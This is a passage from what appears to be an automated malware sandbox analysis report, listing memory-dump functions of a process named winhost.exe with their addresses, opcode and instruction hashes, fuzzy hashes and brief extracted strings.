                                            • Opcode ID: 7be8fab9b8f3ada58f2a279c228692606cb9bb67960e19b1f0ee6517a076971b
                                            • Instruction ID: 2c14937f4a19762303efe693587ab4ddac21bf9770ee84f9a402d0745064eb72
                                            • Opcode Fuzzy Hash: 7be8fab9b8f3ada58f2a279c228692606cb9bb67960e19b1f0ee6517a076971b
                                            • Instruction Fuzzy Hash: 6D01D451B1DA4A4FE746972C48957243FE0EF5B251F9940F2E40DCB2E3EE189C06D361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC8E06, Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d63ef03b53ae083ccdd25fd00ce3f79d2ed70272dd04d17636ee7aa275a5c244
                                            • Instruction ID: 1fc024b9c19ce9ebf2f71146e7b2ee20747dbb5db873ee8498d67b284e094891
                                            • Opcode Fuzzy Hash: d63ef03b53ae083ccdd25fd00ce3f79d2ed70272dd04d17636ee7aa275a5c244
                                            • Instruction Fuzzy Hash: 0411C26190D7C95FD7539B788865AA53FA1DF57200F4980EAD08DCF0A3DE188A09C7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC821E, Relevance: .1, Instructions: 62COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef5f9d6265ca35db51d3c1e96ae1f643208dfcd356d4a0a2a83663e5e81e374a
                                            • Instruction ID: 0d66ef1f8efaa710f8ee5d8bdb15b68e6e8196517d7c3693104733c7a1850cc1
                                            • Opcode Fuzzy Hash: ef5f9d6265ca35db51d3c1e96ae1f643208dfcd356d4a0a2a83663e5e81e374a
                                            • Instruction Fuzzy Hash: 5A114471608A8D4FDB40EF3888497EA7BE0FF8B314F1441BAE44EC7192DB3999068781
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC047D, Relevance: .0, Instructions: 38COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a20c54a9073ebded0da95867445d40444d9971bb38213b7bd30112f6803d8662
                                            • Instruction ID: f069b19731b2769c4bb10507546c9a6edd3fd19c470ae0e10e3bde9f0e9086f0
                                            • Opcode Fuzzy Hash: a20c54a9073ebded0da95867445d40444d9971bb38213b7bd30112f6803d8662
                                            • Instruction Fuzzy Hash: 7FF0271150C3854FFB1697744C993E23F428B56310F0981FAE84C8F1D7CA9D04448363
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC9325, Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8dc99d7debe5e776c282da749f066344b806ac62919dd5ee1d1f073c039e4eb4
                                            • Instruction ID: 100c4f538e2e5d009828bd43e722b18771b38b0985275f06a953c5ebf9000f33
                                            • Opcode Fuzzy Hash: 8dc99d7debe5e776c282da749f066344b806ac62919dd5ee1d1f073c039e4eb4
                                            • Instruction Fuzzy Hash: 22F0202290CB460EE36293681C543726BF4EF8BA21F0600F7E44CCB2C3EE0DAC0483A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC02FD, Relevance: .0, Instructions: 27COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ba05f37a53a7210c5e59b6db397232759d7bc9204dce1ef36057936908fe263d
                                            • Instruction ID: 1381466288e3215acab93de3a1db561f028b82d65d1dcce6c5cd44e0cb58d4d4
                                            • Opcode Fuzzy Hash: ba05f37a53a7210c5e59b6db397232759d7bc9204dce1ef36057936908fe263d
                                            • Instruction Fuzzy Hash: 65E08CA280E7890FE34B93304D613043F609F07A00FDA00D6C048CF0E3E90D5849C322
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FC0F61, Relevance: .0, Instructions: 21COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000010.00000002.726311921.00007FFA35FC0000.00000040.00000001.sdmp, Offset: 00007FFA35FC0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e78414a93df14eafdb13952f25f4d93fae7a169a46ed2f2d15c6f421396958f
                                            • Instruction ID: 5f3f5db198674c7ce06ed19acd8aace8ad8082cf3e9dfd7f91f8be22a9331bcf
                                            • Opcode Fuzzy Hash: 9e78414a93df14eafdb13952f25f4d93fae7a169a46ed2f2d15c6f421396958f
                                            • Instruction Fuzzy Hash: CAD05E0085E2C50BC70293748C1A8967FF59E47110B4FC1F5D489CB053E40D45058363
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Analysis Process: winhost.exe PID: 7000 Parent PID: 3424 winhost.exeCOMMON

                                            Executed Functions

                                            Function 00007FFA35FD0588, Relevance: 5.2, Strings: 4, Instructions: 232COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: s5$ s5$ s5$8.5
                                            • API String ID: 0-2748289946
                                            • Opcode ID: 33da7e904a22c2e4fbd80a17fbf48af6d81f4c9dc65d0138a40aca76657b1ffb
                                            • Instruction ID: dca39df6bbce8aab413cd86b58993ba4eb766e259b5458c4f4fcf387221459df
                                            • Opcode Fuzzy Hash: 33da7e904a22c2e4fbd80a17fbf48af6d81f4c9dc65d0138a40aca76657b1ffb
                                            • Instruction Fuzzy Hash: 6561B630A18B0E8FEB94EB1C84597B937E0FF5A700F5484B9E40ECB196DE39A805DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD094E, Relevance: 3.0, Strings: 2, Instructions: 470COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: h|5$|5
                                            • API String ID: 0-2177373217
                                            • Opcode ID: 17c5d64dc93e32f3161716dd98e89b5ec7a01fb08229cdc5e24493bdb7e92bd3
                                            • Instruction ID: fb94f3e8915f3c37188fbc421faa3c82dfb6bec1fe9e5f24b438fc748494e626
                                            • Opcode Fuzzy Hash: 17c5d64dc93e32f3161716dd98e89b5ec7a01fb08229cdc5e24493bdb7e92bd3
                                            • Instruction Fuzzy Hash: D5F12821A0DB8A4FE3A6E73C88656A57FE1EF5B340F5480FAD04DCB1ABDD186809C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD14D0, Relevance: 2.1, Strings: 1, Instructions: 870COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: X|5
                                            • API String ID: 0-721148514
                                            • Opcode ID: 288a5202977697af4b8dc73be9d742c27eb5da22991c76cff276d9f530316991
                                            • Instruction ID: 86808c7d6ffec9f0abba9bd43089140637300573f61f61eebb3b420576e7b4c5
                                            • Opcode Fuzzy Hash: 288a5202977697af4b8dc73be9d742c27eb5da22991c76cff276d9f530316991
                                            • Instruction Fuzzy Hash: C652C320A1CA8B0FEB69BB2C88957F937D1EF4A700F5480B9E44EC71D7DE29A905D711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD0360, Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: H
                                            • API String ID: 0-2852464175
                                            • Opcode ID: bba08876530eece170a528850c46ef0def0f5537d011ca7479c618124202de80
                                            • Instruction ID: db7d16af2b80d4373882ba76b283776d9137d8a32075c30d0e614f0755d89a8a
                                            • Opcode Fuzzy Hash: bba08876530eece170a528850c46ef0def0f5537d011ca7479c618124202de80
                                            • Instruction Fuzzy Hash: BF416230A19A498FDF94EB3C8456A69B7E1EF56314B5444FCD40ECB296DE28E900C741
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD0D89, Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: |5
                                            • API String ID: 0-878650909
                                            • Opcode ID: 791ecdc92101a45a3fc88beb9d200c154e7fb862aca10c5325697b3a2628b86a
                                            • Instruction ID: 827f4f68b9bca898a3edcb1c0862937c5837f4a40532eca9e76e26aa789c8715
                                            • Opcode Fuzzy Hash: 791ecdc92101a45a3fc88beb9d200c154e7fb862aca10c5325697b3a2628b86a
                                            • Instruction Fuzzy Hash: DB01F411B0DA9D0FD799A76C58507A837C1EF9F240B1084FAD04ED7297EC1958098751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD678E, Relevance: .3, Instructions: 298COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 18cb6c4bc91777abcbeb76ec904970664bdd468ef033ce26859ddfc8ed8353ac
                                            • Instruction ID: b7d2d6ae87e3b419b0ab7f7fcbb21efaa9c956f772022290dad06382d585e575
                                            • Opcode Fuzzy Hash: 18cb6c4bc91777abcbeb76ec904970664bdd468ef033ce26859ddfc8ed8353ac
                                            • Instruction Fuzzy Hash: E9A11870518A8D8FEBA4EF18C8597E97BE0FF49304F408169E84DC7192DF399845CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD84A9, Relevance: .3, Instructions: 275COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 86a139c116227c0261e868ed8d22becef20e0c4c83e72aaa4b70363b1f815082
                                            • Instruction ID: 748e4df160f59946fb04e77d669015d65a1398fdc1c5668577c8e41d1330ee66
                                            • Opcode Fuzzy Hash: 86a139c116227c0261e868ed8d22becef20e0c4c83e72aaa4b70363b1f815082
                                            • Instruction Fuzzy Hash: 0781E26060CB890FE75A9B2C98127A93BD1EF4B700F9481BAF44DC72E3CD29A9059795
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD7899, Relevance: .3, Instructions: 266COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 076474ac2274299d5b447b90f53f3266d3d8c620e3d0e16bc32b115452047fed
                                            • Instruction ID: 41666a0758c696713d8fb4c8f9b375ea0544f60fb0b387dfdd7baa611f1abd99
                                            • Opcode Fuzzy Hash: 076474ac2274299d5b447b90f53f3266d3d8c620e3d0e16bc32b115452047fed
                                            • Instruction Fuzzy Hash: 2F914C70518A4D9FEBA4EF18C899BE93BE0FF59354F948179E80DC7192DE399884CB40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD2851, Relevance: .3, Instructions: 265COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 339135d8329c7ebd1cac2a2e6fa57cf9bf4738b70c02e34d69f03e504a87b0ae
                                            • Instruction ID: 7916dff93c518b10f959fb23df91e549b4102d2c3b4f009e38891bad1a1ecbf9
                                            • Opcode Fuzzy Hash: 339135d8329c7ebd1cac2a2e6fa57cf9bf4738b70c02e34d69f03e504a87b0ae
                                            • Instruction Fuzzy Hash: 05817F70518A4D8FDBA8EF18DC86BE937E1FB59300F50816AE84DC7252DF35AA45CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD20F9, Relevance: .2, Instructions: 246COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4627b45c40b88107a833f2a277ce4ab28a910a623c9dd8a446c25010bb9ebba9
                                            • Instruction ID: 76fa2d3dd84e2fb45e18625620055d422fa9b96f53e54b87cff9c419483c83d5
                                            • Opcode Fuzzy Hash: 4627b45c40b88107a833f2a277ce4ab28a910a623c9dd8a446c25010bb9ebba9
                                            • Instruction Fuzzy Hash: 0B91EB70918A8E8FEBA4DF28C8457E93BE0FF19344F504075E84DC7296DE35A985DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD1158, Relevance: .2, Instructions: 244COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ceed6a7454a588cdf0c49792c32d642a83f33dd9b893901afd86639f4b06c05b
                                            • Instruction ID: 27342eb9da19586dcbcedae8dd8386b96285bedc34ae34a27a15b2f4c426be2a
                                            • Opcode Fuzzy Hash: ceed6a7454a588cdf0c49792c32d642a83f33dd9b893901afd86639f4b06c05b
                                            • Instruction Fuzzy Hash: 23710E30718A494FEB95EB2C889977D77E2EFDA300F5981B5E00DC729BCF6898458742
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD97A5, Relevance: .2, Instructions: 201COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 396aab9bea6868b9844e3ecda8580cc78934cd04b63124f1562a64df427ac612
                                            • Instruction ID: 5df25be5ba309e9fff5cb25be5dc30e16d38f9c60e84cefb05026651677de25b
                                            • Opcode Fuzzy Hash: 396aab9bea6868b9844e3ecda8580cc78934cd04b63124f1562a64df427ac612
                                            • Instruction Fuzzy Hash: 8951F660A0CB8A0FEB55AB2888453B97BE1EF4B700F5481BEE44EC71D7DE28A801D751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD3789, Relevance: .2, Instructions: 186COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6153aeebbc25b3c3fa6171fbb8487af71e931911e0f8432d874268e9a761293a
                                            • Instruction ID: 4b25c645367ba41a4a8447cbb329d2bbe709b731a6ffbb430d8fdbac8da899ed
                                            • Opcode Fuzzy Hash: 6153aeebbc25b3c3fa6171fbb8487af71e931911e0f8432d874268e9a761293a
                                            • Instruction Fuzzy Hash: 3E518F71518B8D8FEBA4DF18C885BE97BE1FB19310F50816AE84DC7292DF34A649CB41
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD7D56, Relevance: .2, Instructions: 177COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 038c196f9290b67ca2b0694e50d3c03cddf4b87c038186d540ac7c173dd2d7c3
                                            • Instruction ID: b2edbb9f6dd9242dc351da7db03a2ee88182a225048c5dd330dac7e336f013b4
                                            • Opcode Fuzzy Hash: 038c196f9290b67ca2b0694e50d3c03cddf4b87c038186d540ac7c173dd2d7c3
                                            • Instruction Fuzzy Hash: A051DF61A0DB8A4FEB969B2C88907A97FE1EF1B340F5440FAE44CCB197CE289D04C751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD2B7A, Relevance: .2, Instructions: 164COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3b947bcc39acd7a0a99ae344cea1069ca763644b3eae91b44907a1afc8bf2c19
                                            • Instruction ID: 48c09fb0c2e46eb1eb8c5e5d83b2a42293218e2057af9bade9da89d2880d57fe
                                            • Opcode Fuzzy Hash: 3b947bcc39acd7a0a99ae344cea1069ca763644b3eae91b44907a1afc8bf2c19
                                            • Instruction Fuzzy Hash: ED41C310B58B8A2FEB56F37888997B97BD2EF5B300F8580F5D40DC72A3DD28A8018751
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35E8A009, Relevance: .1, Instructions: 147COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732085741.00007FFA35E8A000.00000040.00000001.sdmp, Offset: 00007FFA35E8A000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e61108057e4fcf82e45beefa088a3090f1cb9e14f6f15df47f10ac04e8e62660
                                            • Instruction ID: 0b4dbe802f6f7e3b59ce85b242fd6b67431f0f778a8f7cad38e30ea5c9e1626e
                                            • Opcode Fuzzy Hash: e61108057e4fcf82e45beefa088a3090f1cb9e14f6f15df47f10ac04e8e62660
                                            • Instruction Fuzzy Hash: 3541F47140CB855FE76ACF299846A627FF0EF52320F1541DFD488CB1A3E725A845C7A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8C6E, Relevance: .1, Instructions: 127COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4fc694d995ff503de7c8271c592c91f08aeb71e6264c38c03df67a98b8714505
                                            • Instruction ID: 07fd8c906f2a526f4e1a2cff9316b29a4a9d00bd2346b24004885e01e49fe5f9
                                            • Opcode Fuzzy Hash: 4fc694d995ff503de7c8271c592c91f08aeb71e6264c38c03df67a98b8714505
                                            • Instruction Fuzzy Hash: BC31386090DB8F4FE755AB3888456B97BD0EF17710F0485BAE04EC70EBDE299800CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD87B5, Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 297122997318a3b9fa416fcd33016e2ff95407020666e830fda743f0578bff9c
                                            • Instruction ID: 20b249dbd9d8faa4e3cd1caf318f0af922923c19312b25fe1798fd140375591b
                                            • Opcode Fuzzy Hash: 297122997318a3b9fa416fcd33016e2ff95407020666e830fda743f0578bff9c
                                            • Instruction Fuzzy Hash: 1031246150DBC95FE746AB388846BA97FE0EF47710F4580DEE48CC7093DE689909C792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8121, Relevance: .1, Instructions: 116COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93ab0e7b439cffa334152280162bd07dd9bcf3072fb53a96ae93259123e8f7ce
                                            • Instruction ID: 1111f76d5ddeff2f6dcf29e03c58dd3dae180312a808d0bd451bc89fd00dbe95
                                            • Opcode Fuzzy Hash: 93ab0e7b439cffa334152280162bd07dd9bcf3072fb53a96ae93259123e8f7ce
                                            • Instruction Fuzzy Hash: 7731D771B08B4A4FE744AB2C88856B93BE1EF5A701F04807AF40DC7297DE299C09C791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8B11, Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 89d69c9edc2d0f8378f4d89afd4a88058aaf748d30871b7f650635a95d1e5745
                                            • Instruction ID: ec3dcf1a0b3b784e9c5b24a210081bdf8feca911b530814db61a0e5471851288
                                            • Opcode Fuzzy Hash: 89d69c9edc2d0f8378f4d89afd4a88058aaf748d30871b7f650635a95d1e5745
                                            • Instruction Fuzzy Hash: 5B31B461708F4A4FDBA5EB5C889977837D1EF6E701B0540B6D04DC7267CE24AC45CB42
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD9288, Relevance: .1, Instructions: 105COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a65939b7e726dcefb70c65362d19bae43176dc796a274a38e51a1a09d6b32fd6
                                            • Instruction ID: 3809c116dbc6f38605cd3eff4238f21bbaef428bcd20b0420d3efdd396011bc0
                                            • Opcode Fuzzy Hash: a65939b7e726dcefb70c65362d19bae43176dc796a274a38e51a1a09d6b32fd6
                                            • Instruction Fuzzy Hash: E031C620A1D68A4FEB95DB2C88607793BE1EF47201F9581FAE84ECB1D3DE285C44C711
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8EC9, Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 061226c4ea56b35fc5a50688224a424655c73eff6b64b2e624f2f3f99c15e88a
                                            • Instruction ID: e0cf0e079163d9ebf4d37a87fda917a90df0fd84a952eb432c4000b5627b092e
                                            • Opcode Fuzzy Hash: 061226c4ea56b35fc5a50688224a424655c73eff6b64b2e624f2f3f99c15e88a
                                            • Instruction Fuzzy Hash: 7A312561A0CB8A5FE742DB2888917A5BFE1EF47300F5481F6E04DCB1A3DF28A805C761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD2709, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e19331699cd926a764d5eb990c96cec1d1b49fa3f1095f880d201f96c57be653
                                            • Instruction ID: a6b841f1440f1a31e62379b3a5f681e4736093bf1ee3f3602e5e7b84005521d4
                                            • Opcode Fuzzy Hash: e19331699cd926a764d5eb990c96cec1d1b49fa3f1095f880d201f96c57be653
                                            • Instruction Fuzzy Hash: 653129B1418A8D9FDB81DF28C854BEA7BE0FF59344F5142AAE84DC7191DB389648CB81
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD7F7D, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7eccbe93685e0f0f6a57b81cf9c9bf904fe4aa978614324d7733d5f968ef7c1a
                                            • Instruction ID: e68c7716f3e168870bbc7acc3096386596f0aec1809124085cbfdf64b6e48b09
                                            • Opcode Fuzzy Hash: 7eccbe93685e0f0f6a57b81cf9c9bf904fe4aa978614324d7733d5f968ef7c1a
                                            • Instruction Fuzzy Hash: 37319F6590E7C60FE347873888696207FF1AF07214B4E80EAD08CCF0A7EA595C49CB22
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD960D, Relevance: .1, Instructions: 97COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4110f0e4f7939173db45e94aa1137a9a89db45bc3532f55389d1c64702d1a1d
                                            • Instruction ID: c3e8e507dbeda68accbc62f151a494e44ca740347b2cbb2f738e01e7cb2a9876
                                            • Opcode Fuzzy Hash: a4110f0e4f7939173db45e94aa1137a9a89db45bc3532f55389d1c64702d1a1d
                                            • Instruction Fuzzy Hash: FE215C6061870E5FDB54EF2888916BA77E1FF4A300F40C0B9E80ECB18ADE29E801DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD8800, Relevance: .1, Instructions: 94COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: eed3d94b35c03d488522278b7247fe8339a32881c5ca55681ff9d96f8912f927
                                            • Instruction ID: 24d0b821c06803661953465538285faf4211ce9f8148e09461b6650aee46d2e1
                                            • Opcode Fuzzy Hash: eed3d94b35c03d488522278b7247fe8339a32881c5ca55681ff9d96f8912f927
                                            • Instruction Fuzzy Hash: 9B21F46161CB8D5FEB49EF2C88467A97FE0EB4A700F5041AEE48DC3182DE786944C792
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD9AD9, Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0d480967c0a4da4a8e4b34d98a1a2acf7c9481b51152d8c97a7886ddd2140f96
                                            • Instruction ID: 3bce95030e0dc7a839c3da5850bead510b45a43f884d369440f266702d36cf94
                                            • Opcode Fuzzy Hash: 0d480967c0a4da4a8e4b34d98a1a2acf7c9481b51152d8c97a7886ddd2140f96
                                            • Instruction Fuzzy Hash: 0A21A06140E7C65ED7539B7888159A17FE0AF0B650F4E84EED4CDCB093DE1A8609CB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00007FFA35FD00A4, Relevance: .1, Instructions: 88COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.732360692.00007FFA35FD0000.00000040.00000001.sdmp, Offset: 00007FFA35FD0000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c589ee16fb0623f23abb6fa2b11032f2540cbd164498d2fc40dab696ba6151e4
                                            • Instruction ID: b1c4f943e3ce09736f5976ec3ae5847e9bf0cb749f241e4bb19e8b00add61afd
                                            • Opcode Fuzzy Hash: c589ee16fb0623f23abb6fa2b11032f2540cbd164498d2fc40dab696ba6151e4
